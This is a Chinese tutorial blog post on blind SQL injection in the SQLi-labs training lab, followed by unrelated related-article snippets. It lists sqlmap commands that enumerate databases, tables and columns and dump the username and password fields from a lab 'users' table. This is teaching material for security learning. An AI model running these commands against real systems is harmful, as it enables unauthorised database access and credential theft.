SQL labs-SQL注入(三,sqlmap使用)

news2024/11/27 0:34:40

本文仅作为学习参考使用,本文作者对任何使用本文进行渗透攻击破坏不负任何责任。

引言:

盲注简述:是在没有回显得情况下采用的注入方式,分为布尔盲注和时间盲注。

布尔盲注:布尔仅有两种形式,ture(对),false(错)两种形式。

对,有回显;错,无回显。根据其性质,就可实现盲注。

时间盲注:在无任何回显所采用的形式,根据数据库响应时间来进行判断。例如:若输入值正确,页面一秒后响应;错误,页面三秒后响应。将其转化为布尔盲注来解决无回显,但如果数据库卡顿,则可能导致误判。

工具注入。

1,工具:sqlmap。

需要提前安装配置python环境,建议使用虚拟机安装的kali linux。自带多种语言环境以及渗透工具,便于使用,虚拟机以及kali安装,源文件可在官网查找,此处不做赘述。

sqlmap -u http://172.168.10.129:8001/Less-8/?id=1 //-u 是指定url

2,检测注入点,得到了数据库版本,传参方式以及漏洞。3,查看所有数据库。

sqlmap  -u http://192.168.239.1:8001/Less-8/?id=1 --dbs

4,查看当前使用的数据库。

sqlmap -u http://192.168.239.1:8001/Less-8/?id=1 --current-db 

5,查看当前数据库内的表名。

sqlmap -u http://192.168.239.1:8001/Less-8/?id=1 -D 'security' --tables

6,查看字段名。

sqlmap -u http://192.168.239.1:8001/Less-8/?id=1 -D 'security' -T 'users' --columns

7,查看敏感数据。

sqlmap -u http://192.168.239.1:8001/Less-8/?id=1 -D 'security' -T 'users' -C username,password --dump

8,查看当前数据库的所有用户。

sqlmap -u http://192.168.239.1:8001/Less-8/?id=1 --users  

这是目前最常用的sql注入工具,具体用法参考这篇文章:SQLmap使用教程图文教程(超详细)-CSDN博客

10,后记。

sql注入漏洞是最基础的漏洞,sqlmap是网络安全维护必不可少的工具。但在学习前也应该先学习一定的诸如:url编码,常见进制转换,php语言以及sql数据库语言。

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/1952359.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

Django学习(二)

get请求 练习: views.py def test_method(request):if request.method GET:print(request.GET)# 如果链接中没有参数a会报错print(request.GET[a])# 使用这个方法,当查询不到参数时,不会报错而是返回你设置的值print(request.GET.get(c,n…

深入解析Flowable:工作流与业务流程管理引擎

深入解析Flowable:工作流与业务流程管理引擎 引言 在数字化时代,企业对流程自动化的需求日益增长。有效的工作流和业务流程管理系统可以帮助组织提高生产力、优化资源分配以及增强决策支持。Flowable是一款开源的工作流和业务流程管理(BPM&a…

Hadoop单机版环境搭建

一 . 案例信息 Hadoop 的安装部署的模式一共有三种: 本地模式,默认的模式,无需运行任何守护进程( daemon ),所有程序都在单个 JVM 上执行。由 于在本机模式下测试和调试 MapReduce 程序较为方便&#x…

Ghost Buster Pro for Mac:系统优化的得力助手

Ghost Buster Pro for Mac是一款功能强大的系统优化工具,专为Mac用户设计,旨在提供全方位的系统清理、优化和维护服务。 这款软件拥有出色的垃圾清理能力,能够深度扫描并清除Mac上的无效目录、文件、系统日志、下载历史记录、缓存和临时文件…

WARNING: Ignoring invalid distribution -ip警告信息如何去掉?

查看已安装依赖列表的时候,出现了很多警告信息,如何去掉呢? 解决办法 打开这个路径:d:\software\python\python39\lib\site-packages 这种波浪线开头的,我们将它删除掉,就可以了。

使用 leanback 库 GridView 管理AnroidTV的焦点

一、前情提要 我当前需要开发一个TV应用,但是之前处理过的焦点问题的很少,现在空下来了,对过往的工作做一个总结分享。在手机APP开发中常用的 RecycleView 在 TV 中开发时,无法解决大量的焦点问题,所以使用leanback进…

OSPF LSA 格式及字段详解

在 AS 内的每台设备,根据设备的路由器类型产生一种或多种 LSA。 LSA 的集合形成了 LSDB(Link-state Database)。 OSPF 中对路由信息的描述都是封装在 LSA 中发布出去的。 常用的 LSA 包括: Router-LSANetwork-LSASummary-LSA&…

postgres启动错误

说明:记录一次在Linux上启动postgres数据错误; 问题:安装好postgres数据库后,我使用systemctl启动数据库,报下面的错误 ● postgresql-15.service - PostgreSQL 15 database serverLoaded: loaded (/usr/lib/systemd…

力扣225 | 两个队列实现栈的思想解析 | 详细图解 Java代码实现

做题链接 目录 前言: 一、思想详解 1.push(x) 2.pop() 弹出栈顶元素 3.top() 获取栈顶元素(但不弹出) 4.empty() 二、编程实战 1.Java前置知识 2.代码实现: 前言: 栈是一种后进先出数据结构。队列是一种先进…

学习大数据DAY22 Linux 基 本 指 令 3与 在 Linux 系 统 中 配 置MySQL 和 Oracle

目录 网络配置类 ps 显示系统执行的进程 kill systemctl 服务管理 配置静态 ip 常见错误---虚拟机重启网卡失败或者网卡丢失 mysql 操作 上机练习 6---安装 mysql---参考《mysql 安装》文档 解锁 scott 重启后的步骤 上机练习 7---安装 oracle---参考《oracle 安装》…

redis:清除缓存的最简单命令示例

清除redis缓存命令(执行命令列表见截图) 1.打开cmd窗口,并cd进入redis所在目录 2.登录redis redis-cli 3.查询指定队列当前的记录数 llen 队列名称 4.清除指定队列所有记录 ltrim 队列名称 1 0 5.再次查询,确认队列的记录数是否已清除

使用API Monitor探测C++程序在调用HtmlHelp接口打开.chm文件时传入了哪些参数

目录 1、API Monitor介绍 2、为何要使用API Monitor工具? 2、HtmlHelp函数在API列表函数中找不到,将所在模块作为外部Extern DLL模块添加到API Monitor中 3、开启对Beyond Compare工具软件的实时监测 4、在Beyond Compare软件中打开chm帮助文档&…

MiniExcel:.NET中处理Excel的高效方案

在.NET开发环境中,处理Excel文件是一项常见的任务,无论是数据导入、导出还是报表生成。传统的解决方案可能存在性能瓶颈或功能限制。MiniExcel作为一个现代、高效的库,为.NET开发者提供了一个强大的工具来简化Excel操作。本文将介绍MiniExcel…

【数据结构】排序算法——Lesson2

Hi~!这里是奋斗的小羊,很荣幸您能阅读我的文章,诚请评论指点,欢迎欢迎 ~~ 💥💥个人主页:奋斗的小羊 💥💥所属专栏:数据结构 🚀本系列文章为个人学…

Scrapy 爬取旅游景点相关数据(四)

本节内容主要为: (1)创建数据库 (2)创建数据库表 (3)爬取数据进MYSQL库 1 新建数据库 使用MYSQL数据库存储数据,创建一个新的数据库 create database scrapy_demo;2 新建数据表 CR…

2024年【非高危行业生产经营单位主要负责人解析

题库来源:安全生产模拟考试一点通公众号小程序 非高危行业生产经营单位主要负责人及安全管理人员安全生产知识和管理能力考试报名是安全生产模拟考试一点通生成的,非高危行业生产经营单位主要负责人及安全管理人员安全生产知识和管理能力证模拟考试题库…

【Redis宕机啦!】Redis数据恢复策略:RDB vs AOF vs RDB+AOF

文章目录 Redis宕机了,如何恢复数据为什么要做持久化持久化策略RDBredis.conf中配置RDBCopy-On-Write, COW快照的频率如何把握优缺点 AOFAOF日志内容redis.conf中配置AOF写回策略AOF日志重写AOF重写会阻塞吗优缺点 RDB和AOF混合方式总结 Redis宕机了,如何…

C语言图书信息管理系统

题目:图书信息管理系统 内容及主要功能描述: 该系统用于管理图书信息,包括图书的增加、删除、查找、修改、浏览、按出版社统计图书数量等功能。具体功能包括: 增加图书:输入图书信息并添加到系统中。删除图书&#x…

golang设置远程调试

1. 目标机器构建安装dlv https://github.com/go-delve/delve go build之后将编译号的dlv命令路径添加到PATH里 2. 目标机器下载源代码并且运行dlv dlv debug --headless --listen:2345 --api-version2 --accept-multiclient 3.本机添加go remote 4. 设置断点即可

JAVA简介与开发环境配置(基础介绍 一)

目录 Java 简介 主要特性 发展历史 Java开发工具 Java 开发环境配置 window系统安装java 下载JDK 配置环境变量 通过控制台测试JDK是否安装成功 Linux,UNIX,Solaris,FreeBSD环境变量设置 流行JAVA开发工具 使用 Eclipse 运行第一…